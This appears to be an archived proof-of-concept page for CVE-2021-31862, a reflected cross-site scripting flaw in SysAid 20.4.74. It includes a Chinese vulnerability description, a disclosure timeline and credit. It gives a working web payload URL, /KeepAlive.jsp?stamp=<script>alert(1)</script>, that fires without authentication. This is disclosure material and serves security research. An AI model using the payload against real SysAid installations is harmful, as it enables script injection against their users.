CVE-2021-31862 PoC — Sysaid Technologies SysAid 跨站脚本漏洞

Source

https://github.com/RobertDra/CVE-2021-31862

Associated Vulnerability

Title:Sysaid Technologies SysAid 跨站脚本漏洞 (CVE-2021-31862)
Description:Sysaid Technologies SysAid是以色列SysAid Technologies（Sysaid Technologies）公司的一套IT服务管理解决方案。 SysAid Technologies SysAid 20.4.74 存在安全漏洞，该漏洞允许通过 KeepAlive.jsp 标记参数进行 XSS，无需任何身份验证。

Readme

# CVE-2021-31862

SysAid 20.4.74 allows reflected XSS via the KeepAlive.jsp parameter, without authentication.


Timeline

Discovered: April 28, 2021

Initial Vendor Contact: April 28, 2021

Reported: April 28, 2021

CVE ID issued: April 28, 2021

Secondary Vendor Contact: (Vendor did not reply to initial contact): May 28, 2021

Public Release: October 29, 2021

Affected Versions:

20.4.74 and prior

Credit:

Citadel Cyber Security (https://www.citadel.co.il/)


POC Exploit:

The following URL path and query parameters will trigger an XSS vulnerability.

/KeepAlive.jsp?stamp=<script>alert(1)</script>&tabID=10&lastClick=1618311643298


![image](https://user-images.githubusercontent.com/68341018/139206439-dca9e0ba-5213-458b-8811-4e2ced3d8c73.png)

File Snapshot


 [4.0K]  /data/pocs/29289b16433cb47c245bec4fc7e5a8b2ca18044a
└── [ 755]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!